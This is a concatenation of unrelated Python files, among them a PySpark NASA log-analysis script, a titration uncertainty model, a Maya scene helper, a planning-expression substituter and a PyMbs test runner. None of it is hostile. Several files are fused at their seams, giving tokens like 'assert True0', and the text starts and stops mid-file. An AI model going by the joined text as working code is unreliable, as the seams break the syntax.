DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 8)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 9)) labelSurface = metricsFont.render("(F0+F1+F2)/3", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 9)) labelSurface = metricsFont.render("(F3+F4)/2", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 9)) labelSurface = metricsFont.render("(F5+F6+F7)/3", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 9)) labelSurface = metricsFont.render(force012String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 11)) labelSurface = metricsFont.render(force34String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 11)) labelSurface = metricsFont.render(force567String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 11)) pygame.display.update() if TRANSMISSION_PORT > 0: clientsocket.send(str("c0").encode('ascii')) clientsocket.close() boogioPeripheral.disconnect() pygame.quit() if __name__ == "__main__": main() 0 """ ML_playground Playing around wiht tf, pytorch, ANI, deepchem .... """ # Add imports here from .ml_playground import * # Handle versioneer from ._version import get_versions versions = get_versions() __version__ = versions['version'] __git_revision__ = versions['full-revisionid'] del get_versions, versions """ A simple script designed to loop through policy dirs and compare all company policies to one another to determine no duplicates have been saved. Duplicates can be caused by policies generated by a legacy wayback_search.py version or simply by the wayback service pointing us to a slightly different date of an archived version of a website one time vs another. """ from wayback_search import POLICY_DIR, make_index_file_name import pandas as pd import filecmp import os def main(): company_dirs = [(os.path.join(POLICY_DIR, x), x) for x in os.listdir(POLICY_DIR) if '.csv' not in x] print(company_dirs) removed = list() for cdir, company in company_dirs: # there should only be policies in the dir but here we double-check policies = [os.path.join(cdir, x) for x in os.listdir(cdir) if '.txt' in x] print(cdir) # and now we cross compare for duplicates for i, p1 in enumerate(policies): p1_name = os.path.basename(p1) for p2 in policies[i:]: p2_name = os.path.basename(p2) if p1 == p2 or not os.path.exists(p1) or not os.path.exists(p2): continue print('{} <-> {}'.format(p1_name, p2_name)) same = filecmp.cmp(p1, p2) if same: print('same!') os.remove(p2) removed.append((company, p2_name)) print('Removed: {}'.format(removed)) # now we have to remove these entries from the index files for company, dead_policy in removed: cindex = os.path.join(POLICY_DIR, make_index_file_name(company)) df = pd.read_csv(cindex) df = df[~df.policy_path.str.contains(dead_policy)] df.to_csv(cindex, index=False) print('fixed {}'.format(cindex)) if __name__ == '__main__': main() puneet3663/Big-Data-Analytics-in-Spark-with-Python-and-SQL #!/usr/bin/env python # coding: utf-8 # In[1]: # import spark liriaries from pyspark.context import SparkContext from pyspark.sql.context import SQLContext from pyspark.sql.session import SparkSession from pyspark.sql.functions import regexp_extract from pyspark.sql.functions import col from pyspark.sql.functions import sum as spark_sum from pyspark.sql.functions import desc, row_number, monotonically_increasing_id from pyspark.sql.window import Window from pyspark.sql.functions import udf # load up other dependencies import re import glob import optparse # In[2]: sc = SparkContext() sqlContext = SQLContext(sc) spark = SparkSession(sc) # In[3]: # Download NASA_access_log_Aug95.gz file #get_ipython().system(' wget ftp://ita.ee.lbl.gov/traces/NASA_access_log_Aug95.gz') # In[4]: #insert data raw_data_files = glob.glob('*.gz') raw_data_files # In[5]: base_df = spark.read.text(raw_data_files) #base_df.printSchema() # In[6]: base_df_rdd = base_df.rdd # In[7]: sample_logs = [item['value'] for item in base_df.take(15)] # In[8]: host_pattern = r'(^\S+\.[\S+\.]+\S+)\s' hosts = [re.search(host_pattern, item).group(1) if re.search(host_pattern, item) else 'no match' for item in sample_logs] # In[9]: ts_pattern = r'\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} -\d{4})]' timestamps = [re.search(ts_pattern, item).group(1) for item in sample_logs] # In[10]: method_uri_protocol_pattern = r'\"(\S+)\s(\S+)\s*(\S*)\"' method_uri_protocol = [re.search(method_uri_protocol_pattern, item).groups() if re.search(method_uri_protocol_pattern, item) else 'no match' for item in sample_logs] # In[11]: status_pattern = r'\s(\d{3})\s' status = [re.search(status_pattern, item).group(1) for item in sample_logs] # In[12]: content_size_pattern = r'\s(\d+)$' content_size = [re.search(content_size_pattern, item).group(1) for item in sample_logs] # In[13]: logs_df = base_df.select(regexp_extract('value', host_pattern, 1).alias('host'), regexp_extract('value', ts_pattern, 1).alias('timestamp'), regexp_extract('value', method_uri_protocol_pattern, 1).alias('method'), regexp_extract('value', method_uri_protocol_pattern, 2).alias('endpoint'), regexp_extract('value', method_uri_protocol_pattern, 3).alias('protocol'), regexp_extract('value', status_pattern, 1).cast('integer').alias('status'), regexp_extract('value', content_size_pattern, 1).cast('integer').alias('content_size')) #logs_df.show(10, truncate=True) #print((logs_df.count(), len(logs_df.columns))) # In[14]: df_with_seq_id = logs_df.withColumn('index', row_number().over(Window.orderBy(monotonically_increasing_id())) - 1) #df_with_seq_id.show() # In[15]: bad_rows_df = df_with_seq_id.filter(logs_df['host'].isNull()| df_with_seq_id['timestamp'].isNull() | df_with_seq_id['method'].isNull() | df_with_seq_id['endpoint'].isNull() | df_with_seq_id['status'].isNull() | df_with_seq_id['content_size'].isNull()| df_with_seq_id['protocol'].isNull()) # In[16]: def count_null(col_name): return spark_sum(col(col_name).isNull().cast('integer')).alias(col_name) # Build up a list of column expressions, one per column. exprs = [count_null(col_name) for col_name in df_with_seq_id.columns] # Run the aggregation. The *exprs converts the list of expressions into # variable function arguments. #logs_df.agg(*exprs).show() # In[17]: regexp_extract('value', r'\s(\d{3})\s', 1).cast('integer').alias( 'status') # In[18]: null_status_df = base_df.filter(~base_df['value'].rlike(r'\s(\d{3})\s')) # In[19]: bad_status_df = null_status_df.select(regexp_extract('value', host_pattern, 1).alias('host'), regexp_extract('value', ts_pattern, 1).alias('timestamp'), regexp_extract('value', method_uri_protocol_pattern, 1).alias('method'), regexp_extract('value', method_uri_protocol_pattern, 2).alias('endpoint'), regexp_extract('value', method_uri_protocol_pattern, 3).alias('protocol'), regexp_extract('value', status_pattern, 1).cast('integer').alias('status'), regexp_extract('value', content_size_pattern, 1).cast('integer').alias('content_size')) # In[20]: logs_df = df_with_seq_id[logs_df['status'].isNotNull()] exprs = [count_null(col_name) for col_name in logs_df.columns] #logs_df.agg(*exprs).show() # In[21]: regexp_extract('value', r'\s(\d+)$', 1).cast('integer').alias('content_size') # In[22]: null_content_size_df = base_df.filter(~base_df['value'].rlike(r'\s\d+$')) #null_content_size_df.count() # In[23]: logs_df = logs_df.na.fill({'content_size': 0}) exprs = [count_null(col_name) for col_name in logs_df.columns] #logs_df.agg(*exprs).show() # In[24]: #logs_df.show() # In[25]: month_map = { 'Jan': 1, 'Feb': 2, 'Mar':3, 'Apr':4, 'May':5, 'Jun':6, 'Jul':7, 'Aug':8, 'Sep': 9, 'Oct':10, 'Nov': 11, 'Dec': 12 } def parse_clf_time(text): """ Convert Common Log time format into a Python datetime object Args: text (str): date and time in Apache time format [dd/mmm/yyyy:hh:mm:ss (+/-)zzzz] Returns: a string suitable for passing to CAST('timestamp') """ # NOTE: We're ignoring the time zones here, might need to be handled depending on the problem you are solving return "{0:04d}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}".format( int(text[7:11]), month_map[text[3:6]], int(text[0:2]), int(text[12:14]), int(text[15:17]), int(text[18:20]) ) # In[26]: udf_parse_time = udf(parse_clf_time) logs_df = (logs_df.select('*', udf_parse_time(logs_df['timestamp']) .cast('timestamp') .alias('time')) .drop('timestamp')) # In[27]: #logs_df.show(10, truncate=True) # In[28]: #logs_df.printSchema() # In[29]: logs_df.cache() # In[30]: # Initializing SparkSession sc = SparkSession.builder.appName("PysparkExample").config ("spark.sql.shuffle.partitions", "50").config("spark.driver.maxResultSize","5g").config ("spark.sql.execution.arrow.enabled", "true").getOrCreate() # In[31]: # Registering a table logs_df.registerTempTable("data_table") # In[32]: #sc.sql("select * from data_table").show(20) # In[39]: def q1(): #print ("Top 10 requested pages and the number of requests made for each") sql = """ select endpoint as pages, count (endpoint) as requests from data_table where method = 'GET' group by endpoint order by requests desc limit 10 """ return spark.sql(sql).show() # In[ ]: # In[41]: def q2(): #print ("Percentage of successful requests (anything in the 200s and 300s range)") sql = """ select (select count(status) from data_table where status like '2%%' or status like '3%%') / (select count(status) from data_table) * 100 as Percentage_of_successful_requests """ return spark.sql(sql).show() # In[42]: def q3(): #print ("Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)") sql = """ select (select count(status) from data_table where status NOT LIKE '2%%' and status NOT LIKE '3%%') / (select count(status) from data_table) * 100 as Percentage_of_successful_requests """ return spark.sql(sql).show() # In[43]: def q4(): #print ("Top 10 unsuccessful page requests") sql = """ select endpoint as pages, count (endpoint) as requests from data_table where status NOT LIKE '2%%' and status NOT LIKE '3%%' and method = 'GET' group by endpoint order by requests desc limit 10 """ return spark.sql(sql).show() # In[44]: def q5(): #print("The top 10 hosts making the most requests, displaying the IP address and number of requests made.") sql = """ select host, endpoint,count (endpoint) as requests from data_table where method = 'GET' group by endpoint, host order by requests desc limit 10 """ return spark.sql(sql).show() # In[ ]: # In[45]: #print ("Start the Parser!!!!",'\n') #import argparse# Create the parser #def fib(sql): # return spark.sql(sql).show() # Import the library #parser = argparse.ArgumentParser()# Add an argument #parser.add_argument('--sql', type=str, required=True)# Parse the argument #args = parser.parse_args() #(options, args) = parser.parse_args() #result = fib(options.sql) #def fib(sql): # return spark.sql(sql).show() def Main(): parser = optparse.OptionParser('usage'+'--q1 or --q2 or --q3 etc. ' , version="%prog 1.0") parser.add_option('--q1', dest='q1', type='string',help='q1: Top 10 requested pages and the number of requests made for each') parser.add_option('--q2', dest='q2', type='string',help='q2: Percentage of successful requests (anything in the 200s and 300s range)') parser.add_option('--q3', dest='q3', type='string',help='q3: Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)') parser.add_option('--q4', dest='q4', type='string',help='q4: Top 10 unsuccessful page requests') parser.add_option('--q5', dest='q5', type='string',help='q5: The top 10 hosts making the most requests, displaying the IP address and number of requests made.') (options, args) = parser.parse_args() if (options.q1 != None): print ('\n','q1: Top 10 requested pages and the number of requests made for each','\n') #sql = options.q1 result = q1() if (options.q2 != None): print ('\n','q2: Percentage of successful requests (anything in the 200s and 300s range)','\n') #sql = options.q2 result = q2() if (options.q3 != None): print ('\n','q3: Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)','\n') #sql = options.q3 result = q3() if (options.q4 != None): print ('\n','q4: Top 10 unsuccessful page requests','\n') #sql = options.q4 result = q4() if (options.q5 != None): print ('\n','q5: The top 10 hosts making the most requests, displaying the IP address and number of requests made.','\n') #sql = options.q5 result = q5() else: print (parser.usage) exit(0) if __name__ == '__main__': Main() from __future__ import with_statement # this is to work with python2.5 from pyps import workspace from os import remove import pypips filename="partialeval03" pypips.delete_workspace(filename) with workspace(filename+".c", parents=[], deleteOnClose=False,name=filename) as w: m=w['main'] m.partial_eval() m.display() """ This example is not finished """ import numpy as np import pandas as pd from pydsge import DSGE import matplotlib.pyplot as plt from sympy import Matrix, symbols from statsmodels.tsa.filters.hp_filter import hpfilter from pydsge import FRED fred = FRED() # ===== Grab and organize Data ===== # # Get data from the FRED series_dict = {'CPIAUCSL': 'CPI', 'GDP': 'GDP', 'DFF': 'Fed Funds Rate'} df = fred.fetch(series_id=series_dict) # Observed varibles df_obs = pd.DataFrame() df_obs['CPI'] = df['CPI'].dropna().resample('Q').last().pct_change(1) * 4 df_obs['FFR'] = df['Fed Funds Rate'].resample('Q').mean() df_obs['outputgap'], _ = hpfilter(np.log(df['GDP'].resample('Q').last().dropna()), 1600) df_obs = df_obs.dropna() df_obs = df_obs[df_obs.index >= '2000-01-01'] # ================================ # ===== MODEL ESPECIFICATION ===== # ================================ # endogenous variables at t # endogenous variables at t - 1 # exogenous shocks # expectational shocks # parameters # Summary parameters # model (state) equations # observation equations # ============================= # ===== MODEL ESTIMATION ===== # ============================= # Not all parameters need to be estimated, these are going to be calibrated # priors # DSGE object # Estimation # Posterior Table # IRFs from the estimated Model # Extraxct state variables # Historical Decomposition from VASA.VASA.reduce_vasa_df import * def test_b(): assert True0 """ get list set remove/delete """ print("Import Module : {}".format(__name__)) import pymel.core as pm import maya.cmds as cmds def get_scene_name(): return pm.sceneName().namebase.__str__() def get_scene_path(): return pm.sceneName().abspath().__str__() def get_scene_dir(): return pm.sceneName().dirname().__str__() def get_workspace_path(): return str(pm.Workspace().path.dirname()) def delete_unknown_nodes(): """ Delete all the unknown nodes present in the scene file :return: """ print("Deleting Unknown Nodes") cmds.delete(cmds.ls(type='unknown')) def delete_unknown_plugins(): """ Delete all the unknown plugins present in the scene file :return: """ plugins_list = cmds.unknownPlugin(q=True, l=True) if plugins_list: for plugin in plugins_list: print(plugin) cmds.unknownPlugin(plugin, r=True) def list_all_plugins(status="all", info=False): """ List all plugins , with details :param status: :param info: list the info as well (version,path installed) :return: """ if status == "enabled": print("all active plugins") elif status == "disabled": print("all inactive plugins") elif status == "all": print("List all plugins") print("Improrted Scene module END. {}".format(__name__)) # Copyright 2021 AIPlan4EU project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import unified_planning.walkers as walkers import unified_planning.environment from unified_planning.walkers.identitydag import IdentityDagWalker from unified_planning.model import FNode, OperatorKind from unified_planning.exceptions import UPTypeError from unified_planning.model import Expression from typing import List, Dict class Substituter(IdentityDagWalker): """Performs substitution into an expression """ def __init__(self, env: 'unified_planning.environment.Environment'): IdentityDagWalker.__init__(self, env, True) self.env = env self.manager = env.expression_manager self.type_checker = env.type_checker def _get_key(self, expression, **kwargs): return expression def substitute(self, expression: FNode, substitutions: Dict[Expression, Expression] = {}) -> FNode: """Performs substitution into the given expression. Lets consider the examples: f = a & b subs = {a -> c, (c & b) -> d, (a & b) -> c} substitute(f, subs) = c f = a subs = {a -> c, c -> d} substitute(f, subs) = c f = a & b subs = {a -> 5, b -> c} substitute(f, subs) raises an UPTypeError Note that, since subs is a dictionary: f = a subs = {a -> b, a -> c} substitute(f, subs) = c """ if len(substitutions) == 0: return expression new_substitutions: Dict[FNode, FNode] = {} for k, v in substitutions.items(): new_k, new_v = self.manager.auto_promote(k, v) if self.type_checker.is_compatible_exp(new_v, new_k): new_substitutions[new_k] = new_v else: raise UPTypeError( f"The expression type of {str(k)} is not compatible with the given substitution {str(v)}") return self.walk(expression, subs = new_substitutions) @walkers.handles(OperatorKind) def walk_replace_or_identity(self, expression: FNode, args: List[FNode], subs: Dict[FNode, FNode] = {}, **kwargs) -> FNode: res = subs.get(expression, None) if res is not None: return res else: return IdentityDagWalker.super(self, expression, args, **kwargs) 1-10 # Copyright 2021 The CFU-Playground Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os.path from nmigen import * from nmigen.back import verilog from gateware.hps_cfu import make_cfu VERILOG_FILENAME = "cfu.v" def read_file(): if os.path.exists(VERILOG_FILENAME): with open(VERILOG_FILENAME, "r") as f: return f.read() return None def main(): cfu = make_cfu() new_verilog = verilog.convert(cfu, name='Cfu', ports=cfu.ports) old_verilog = read_file() if new_verilog != old_verilog: with open(VERILOG_FILENAME, "w") as f: f.write(new_verilog) if __name__ == '__main__': main() 1-10 """ titration.py Bayesian modelling of titration volumes and concentrations """ # imports import numpy as np import tensorflow as tf tf.enable_eager_execution() import tensorflow_probability as tfp from tensorflow_probability import distributions as tfd import copy from tensorflow_probability import edward2 as ed from utils import * # @tf.contrib.eager.defun def cov(x): """ Covariance of an 2D array. $ K_{XX} = Cov(X, X) = E(X^T X) - E^T(X)E(X) $ Parameters ---------- X : tf.Tensor Returns ------- cov : the covariance matrix """ # X.shape = (n_samples, time) n_samples = x.shape[0].value xtx = tf.matmul(tf.transpose(x), x) e_xtx = tf.div(xtx, n_samples) e_x = tf.reduce_mean(x, axis=[0], keep_dims=True) et_x = tf.transpose(e_x) # note that we use this transpose form because # n_samples is at the first axis cov_ = e_xtx - tf.matmul(et_x, e_x) return cov_ class Solution: """A Solution object contains the information about the solution, i.e. species, concentrations, and so forth. Attributes ---------- concs : list or np.ndarray, shape = (3, ), concentrations of the solution d_concs : list or np.ndarray, shape = (3, ), uncertainty of concentrations of the solution """ # TODO: use this class to further record physical constants. def __init__(self, conc_p = 0, conc_l = 0, conc_r = 0, d_conc_p = 0, d_conc_l = 0, d_conc_r = 0, concs = None, d_concs = None): if concs == None: concs = [conc_p, conc_l, conc_r] if d_concs == None: d_concs = [d_conc_p, d_conc_l, d_conc_r] self.concs = tf.constant(concs, dtype=tf.float32) self.d_concs = tf.constant(d_concs, dtype=tf.float32) class Plate: """A Plate object contains all the information about the volumes, concentrations of species, as well as the covariance thereof, in a certain time series. Attributes ---------- n_wells : int number of cells in the plate. path_length : float length of the path of the cells. sampled : Boolean whether this plate is sampled or not. finished_selected_non_zero : Boolean to keep record of whether the process of select nonzero volumes are finished, to ensure that Cholesky decomposition works. ind_vols : tf.Tensor volumes of liquid in cells in each step. ind_concs : tf.Tensor concentrations of species in each step. ind_d_vols : tf.Tensor uncertainty associated with ind_vols. ind_d_concs : tf.Tensor uncertainty associated with ind_concs. """ def __init__(self, n_wells: int, path_length: float = 1.0) -> None: # generic properties of the plate self.n_wells = n_wells self.path_length = path_length # flags for status self.sampled = False self.finished_select_non_zero = False # matrices to keep track of the quantities in the plate # individual volumes at each time step # (time, n_wells) self.ind_vols = tf.zeros((1, n_wells), dtype=tf.float32) # individual concentrations at each time step # (time, 3, n_wells) self.ind_concs = tf.zeros((1, 3, n_wells), dtype=tf.float32) # uncertainty associated with ind_vols # (time, n_wells) self.ind_d_vols = tf.zeros((1, n_wells), dtype=tf.float32) # uncertainty associated with ind_concs # (time, 3, n_wells) self.ind_d_concs = tf.zeros((1, 3, n_wells), dtype=tf.float32) def inject( self, solution = None, well_idx: int = 0, vol: float = 0.0, d_vol: float = 0.0) -> None: """Models one titration, with: certain species, volume $V$, uncertainty of volume $dV$, concentration of that species $c$, uncertainty of the concentration $dc$. The values should be read from the solution; the errors are determined by uncertainty in the purity, instrument error, etc. Following things happen: 1. The expected volume of the cell increased by $V$. this is modelled by appending value $V$ at the end of volume tensor. 2. Uncertainty introduced to the volume. This is modelled by expanding another column and another row at the end of covariance matrix, and filling it with $dV$. 3. The expected concentration of the certain species becomes: $$ \frac{c_0 V_0 + cV}{V_0 + V}$$ 4. Error introduced to the concentration. This is modelled by expanding another column and another row at the end of covariance matrix, and filling it with $$ \sigma^2(c)E(\frac{V}{V + V_0})$$ Parameters ---------- solution : the solution object to be injected into the plate. cells : list indicies of cells vols : volumes of the injection d_vol : uncertainty associated with val """ # assert that the place of injection is within the plate assert well_idx < self.n_wells # handle ind_vols new_ind_vols = tf.Variable( tf.zeros((1, self.n_wells), dtype=tf.float32)) new_ind_vols[0, well_idx].assign(vol + new_ind_vols[0, well_idx]) self.ind_vols = tf.concat((self.ind_vols, new_ind_vols), axis=0) # handle ind_concs new_ind_concs = tf.Variable( tf.zeros((1, 3, self.n_wells), dtype=tf.float32)) new_ind_concs[0, :, well_idx].assign(solution.concs + new_ind_concs[0, :, well_idx]) self.ind_concs = tf.concat((self.ind_concs, new_ind_concs), axis=0) # handle ind_d_vols new_ind_d_vols = tf.Variable( tf.zeros((1, self.n_wells), dtype=tf.float32)) new_ind_d_vols[0, well_idx].assign(d_vol + new_ind_d_vols[0, well_idx]) self.ind_d_vols = tf.concat((self.ind_d_vols, new_ind_d_vols), axis=0) # handle ind_d_concs new_ind_d_concs = tf.Variable( tf.zeros((1, 3, self.n_wells), dtype=tf.float32)) new_ind_d_concs[0, :, well_idx].assign(solution.d_concs + new_ind_d_concs[0, :, well_idx]) self.ind_d_concs = tf.concat((self.ind_d_concs, new_ind_d_concs), axis=0) def sample(self, n_samples: int = 1) -> None: """ Sample independent volumes and concentrations and compute the cumulative volumes and concentrations. Parameters ---------- n_samples : int the number of samples """ time = self.ind_vols.shape[0].value n_wells = self.ind_vols.shape[1].value # ======== # sampling # ======== # unravel time series ind_vols_fl = tf.reshape(self.ind_vols, [-1]) ind_concs_fl = tf.reshape(self.ind_concs, [-1]) ind_d_vols_fl = tf.reshape(self.ind_d_vols, [-1]) ind_d_concs_fl = tf.reshape(self.ind_d_concs, [-1]) # put them into random variables ind_vols_fl_rv = MultivariateLogNormalDiag(ind_vols_fl, ind_d_vols_fl) ind_concs_fl_rv = MultivariateLogNormalDiag(ind_concs_fl, ind_d_concs_fl) # sample! # NOTE: here we need to manually log it back ind_vols_fl_sampled = tf.log( ind_vols_fl_rv.sample(n_samples)) ind_concs_fl_sampled = np.log( ind_concs_fl_rv.sample(n_samples)) # drop ref, in case it is used under high performace context del ind_vols_fl del ind_concs_fl del ind_d_vols_fl del ind_d_concs_fl del ind_vols_fl_rv del ind_concs_fl_rv # reshape back # NOTE: although this is not deterministically stable, # it was validated to work # (n_samples, time, n_wells) ind_vols_sampled = tf.reshape( ind_vols_fl_sampled, (n_samples, time, n_wells)) # (n_samples, time, 3, n_wells) ind_concs_sampled = tf.reshape( ind_concs_fl_sampled, (n_samples, time, 3, n_wells)) # ================ # calculating mean # ================ # the cumulative volume is the sum of all the volumes previously # build a lower triangular identity matrix # shape = (time, time) tril_ones = tf.tile( tf.expand_dims(tf.linalg.band_part(tf.eye(time), -1, 0), 0), [n_samples, 1, 1]) # calculate the cumulative volume, sampled # (n_samples, time, n_wells) vols_sampled = tf.matmul(tril_ones, ind_vols_sampled) # (time, n_wells) self.vols = tf.math.reduce_mean(vols_sampled, 0) # handle quantities # (n_samples, time, 3, n_wells) ind_qs = tf.multiply( tf.tile(tf.expand_dims(ind_vols_sampled, 2), [1, 1, 3, 1]), ind_concs_sampled) # we want to implement the following: # qs = tf.matmul(tril_ones, ind_qs) # but this is not supported by TensorFlow # (n_samples, time, 3, n_wells) qs = tf.Variable( tf.zeros([n_samples, time, 3, n_wells], dtype=tf.float32)) idx = tf.constant(0) def loop_body(idx): qs[:, :, idx, :].assign(tf.matmul(tril_ones, ind_qs[:, :, idx, :])) return idx + 1 tf.while_loop( lambda idx: tf.less(idx, tf.constant(3)), lambda idx: loop_body(idx), [idx]) # average to calculate the concentrations # (n_samples, time, 3, n_wells) concs_sampled = tf.div( qs, tf.tile(tf.expand_dims(vols_sampled, 2), [1, 1, 3, 1])) # (time, 3, n_wells) concs = tf.math.reduce_mean(concs_sampled, 0) # convert nan (0/0) to 0. concs = tf.where(tf.math.is_nan(concs), tf.zeros_like(concs), concs) self.concs = concs # ====================== # calculating covariance # ====================== # (time, time, n_wells) vols_cov = tf.Variable( tf.zeros((time, time, n_wells), dtype=tf.float32)) # initialize # NOTE: tf.while_loop is actually paralled idx = tf.constant(0) def loop_body(idx): vols_cov[:, :, idx].assign(cov(vols_sampled[:, :, idx])) return idx + 1 tf.while_loop( lambda idx: tf.less(idx, n_wells), lambda idx: loop_body(idx), [idx]) self.vols_cov = vols_cov # (time, time, 3, n_wells) concs_cov = tf.Variable( tf.zeros((time, time, 3, n_wells), dtype=tf.float32)) idx0 = tf.constant(0) idx1 = tf.constant(0) def loop_body(idx0, idx1): concs_cov[:, :, idx0, idx1].assign( cov(concs_sampled[:, :, idx0, idx1])) return idx0 + 1, idx1 + 1 tf.while_loop( lambda idx0, idx1: tf.logical_and( tf.less(idx0, 3), tf.less(idx1, n_wells)), lambda idx0, idx1 : loop_body(idx0, idx1), [idx0, idx1]) # convert nan (0/0) to 0. concs_cov = tf.where(tf.math.is_nan(concs_cov), tf.zeros_like(concs_cov), concs_cov) self.concs_cov = concs_cov # vim: fileencoding=utf-8 import fnmatch import os import werkzeug from docutils import nodes from docutils.core import publish_parts from docutils.parsers.rst import Directive, directives from pygments import highlight from pygments.formatters import HtmlFormatter from pygments.lexers import LEXERS, guess_lexer_for_filename, TextLexer from blikit import utils from blikit.models import BlobObject from blikit.docutilsext import Writer class Document(object): title = None description = None body = None author_name = None last_modified = None created = None def __init__(self, **attrs): for name, value in attrs.iteritems(): if name.startswith('_'): continue setattr(self, name, value) renderer_map = [] def register_for(*pats): def _register_for(func): for p in pats: renderer_map.append((p, func)) return func return _register_for def render_blob(ctx, blob_obj): u'''render BlobObject as HTML portion using proper render function return if there is no render function for this object, return None ''' if blob_obj.commit.sha is None: # IndexObject # don't cache pass else: cache_key = 'render.render_blob:%s:%s' % \ (blob_obj.commit.sha, blob_obj.abs_name) cached = ctx.app.cache.get(cache_key) if cached is not None: return cached if not isinstance(blob_obj, BlobObject): # TODO: raise proper exception # XXX: may this function treat TreeObject? raise Exception for p, func in renderer_map: if fnmatch.fnmatch(blob_obj.name, p): result = func(ctx, blob_obj) break else: result = None if isinstance(result, Document): if result.author_name is None: result.author_name = blob_obj.author_name if result.last_modified is None: result.last_modified = blob_obj.last_modified if result.created is None: result.created = blob_obj.created if blob_obj.commit.sha is not None: ctx.app.cache.set(cache_key, result) return result @register_for('*.txt') def render_text(ctx, blob_obj): udata = blob_obj.data.decode('utf-8', 'replace') return Document(title=blob_obj.name, body=u'
' + werkzeug.escape(udata) + u'
') @register_for('*.rst') def render_rst(ctx, blob_obj): parts = publish_parts(blob_obj.data, writer=Writer(), settings_overrides={'initial_header_level': 2, 'syntax_highlight': 'short', 'ctx': ctx, 'obj': blob_obj}) parts['description'] = parts['title'] return Document(**parts) @register_for('*.png', '*.jpg', '*.jpeg', '*.gif') def render_images(ctx, blob_obj): w, h = utils.calc_thumb_size(blob_obj.data, (640, 480)) url = ctx.url_for('view_obj', rev=blob_obj.commit.name, path=blob_obj.root_path) raw_url = url + '?raw=1' body = '' % \ (raw_url, raw_url, w, h) return Document(title=blob_obj.name, body=body) formatter = HtmlFormatter(noclasses=True, linenos=True) @register_for(*[p for l in LEXERS.values() for p in l[3]]) def render_sourcecode(ctx, blob_obj): try: data = blob_obj.data.decode('utf-8') except UnicodeDecodeError: data = blob_obj.data try: lexer = guess_lexer_for_filename(blob_obj.name, data) except ValueError: # no lexer found - use the text one instead of an exception lexer = TextLexer() return Document(title=blob_obj.name, description=lexer.name, body=highlight(data, lexer, formatter)) @register_for('*') def render_default(ctx, blob_obj): if '\x00' in blob_obj.data: # maybe binary file # display download link escaped = werkzeug.escape(blob_obj.name) body = 'download "%s"' % (escaped, escaped) return Document(title=blob_obj.name, body=body) else: # maybe some text file # render like *.txt return render_text(ctx, blob_obj) berryscottr/cfb-rankings-superleague-edition import csv import ast import json import pandas as pd for year in range(2010,2021): for week in range (1, 17): new_stats_file = [] outframe = pd.DataFrame() try: with open('src/data/team_stats/{}_week_{}_team_stats.csv'.format(year, week), newline='') as csvfile: reader = csv.reader(csvfile) counter = 0 for row in reader: counter += 1 if counter == 1: new_stats_file.append(['game_id','team','category','stat']) continue stats_row = row[1] json_stats_row = ast.literal_eval(stats_row) for cat in json_stats_row[0]['stats']: new_stats_file.append([row[0], json_stats_row[0]['school'], cat['category'], cat['stat']]) for cat in json_stats_row[1]['stats']: new_stats_file.append([row[0], json_stats_row[1]['school'], cat['category'], cat['stat']]) except FileNotFoundError: print('File not found') with open('src/data/team_stats/{}_week_{}_team_stats_fixed.csv'.format(year, week),'w+', newline='') as outfile: writer = csv.writer(outfile) if(len(new_stats_file) == 0): continue writer.writerows(new_stats_file)# -*- coding: utf-8 -*- ''' This file is part of PyMbs. PyMbs is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. PyMbs is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with PyMbs. If not, see . Copyright 2011, 2012 , , , ''' # call testExamples.py without filename: test all automatically, suppress gui # call testExamples.py with filename: check specific example with visualization # # save dictionary to file import sys import glob import json from PyMbs.Input import MbsSystem try: from colorama import Fore except ImportError: without_colorama = True else: without_colorama = False try: with open('testResults.json', 'r') as f: results = json.loads(f.read()) except IOError: print('No previous test results found; will generate new file') results = {} except ValueError: print('Previous results could not be read; will generate new file') results = {} files = glob.glob('*.py') # Files in directory that aren't examples files.remove('test.py') files.remove('testExamples.py') files.remove('profile.py') files.remove('__init__.py') # called without filename if len(sys.argv) == 1: # Mock GUI call, to iterate over all examples without the need to close # each window MbsSystem.show = lambda *args, **kwargs: True passed = 0 for filename in files: if without_colorama: print(filename) else: print(Fore.GREEN + filename + Fore.RESET) try: exec(compile(open(filename).read(), filename, 'exec')) except: print(sys.exc_info()[0]) # if result key for file exists, don't overwrite second entry if results.get(filename) == None: results[filename] = ["FAILED", "NOT VALIDATED"] else: results[filename][0] = "FAILED" else: passed += 1 if results.get(filename) == None: results[filename] = ["PASSED", "NOT VALIDATED"] else: results[filename][0] = "PASSED" print(str((passed/len(files))*100) + "% have passed.") with open('testResults.json', 'w') as f: f.write(json.dumps(results, indent=1)) # called with filename elif len(sys.argv) == 2: filename = sys.argv[1] 